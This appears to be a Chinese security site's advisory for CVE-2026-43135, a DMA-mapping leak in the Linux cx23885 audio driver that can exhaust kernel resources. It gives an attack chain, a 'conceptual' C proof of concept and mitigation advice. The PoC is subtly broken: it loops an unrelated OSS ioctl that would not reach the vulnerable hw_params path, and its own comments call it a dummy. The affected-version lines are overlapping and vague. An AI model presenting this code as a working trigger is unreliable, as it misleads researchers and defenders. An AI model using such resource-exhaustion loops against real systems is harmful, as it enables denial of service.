CVE-2026-43135 CVSS 5.5 中危

CVE-2026-43135 Linux内核cx23885驱动资源泄漏漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43135

漏洞类型

资源管理错误

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

该漏洞源于Linux内核中cx23885驱动程序在处理音频硬件参数时的逻辑缺陷。在snd_cx23885_hw_params()函数执行过程中，如果遇到错误并进入错误处理路径，代码未能正确调用cx23885_alsa_dma_unmap()函数。这导致此前通过cx23885_alsa_dma_map()获取的DMA映射资源未被释放。本地攻击者可利用此缺陷持续触发该错误路径，从而耗尽系统内核资源，最终导致系统拒绝服务。

技术细节

该漏洞位于Linux内核媒体子系统的cx23885音频驱动代码中，具体涉及snd_cx23885_hw_params()函数的实现。该函数的主要职责是配置音频硬件参数并建立DMA（直接内存访问）映射以进行数据传输。在函数执行过程中，首先会调用cx23885_alsa_dma_map()申请并映射DMA缓冲区。然而，如果在后续操作中出现异常情况（例如分配连续内存失败），代码将跳转至错误处理路径退出。由于该错误处理路径中缺失了对cx23885_alsa_dma_unmap()函数的调用，导致之前申请的DMA资源未能正确释放。本地低权限攻击者可以通过特定的ioctl调用反复触发该错误路径，造成持续的内核资源泄漏，最终耗尽系统DMA资源导致拒绝服务。

攻击链分析

STEP 1

步骤1

攻击者获得对目标Linux系统的本地访问权限，且拥有低权限用户账号。

STEP 2

步骤2

攻击者识别系统中存在cx23885视频采集卡及其对应的音频设备节点（如/dev/snd/pcmCxDy）。

STEP 3

步骤3

攻击者编写或利用程序，反复向该设备节点发送特定的ioctl请求（如设置硬件参数），并故意制造使其失败的条件。

STEP 4

步骤4

内核驱动程序在处理失败的请求时执行错误路径，由于缺少解映射操作，导致DMA资源泄漏。

STEP 5

步骤5

经过大量重复操作，系统DMA资源被耗尽，导致内核内存不足，系统最终崩溃或服务拒绝。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * Conceptual Proof of Concept for CVE-2026-43135
 * This code attempts to trigger the DMA leak in cx23885 driver.
 * Requires a vulnerable system with specific hardware.
 */

#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <linux/soundcard.h>

int main() {
    int fd;
    // Open the audio device associated with cx23885
    // Device node may vary (e.g., /dev/snd/pcmC0D0p)
    fd = open("/dev/snd/pcmC0D0p", O_RDWR);
    if (fd < 0) {
        perror("Failed to open device");
        return 1;
    }

    // Loop to trigger the resource leak
    for (int i = 0; i < 10000; i++) {
        // Attempt to set hardware parameters with invalid values
        // to force the error path in snd_cx23885_hw_params
        // This is a simplified representation; actual triggering
        // may require specific audio format configurations.
        struct audio_buf_info abinfo;
        // A dummy ioctl call that might fail or trigger the path
        // In a real scenario, specific ioctl commands like SNDRV_PCM_IOCTL_HW_PARAMS
        // would be crafted to fail inside the driver.
        if (ioctl(fd, SNDCTL_DSP_GETOSPACE, &abinfo) < 0) {
            // Expecting failures to trigger the leak path
        }
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel < 6.6 (Specific commit fixes needed)

Linux Kernel < 6.1 (Specific commit fixes needed)

防御指南

临时缓解措施

如果无法立即升级内核，建议通过modprobe配置禁用cx23885驱动模块（blacklist cx23885），或者严格限制/dev/snd/目录下相关设备文件的访问权限，仅允许信任的用户或应用程序访问。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表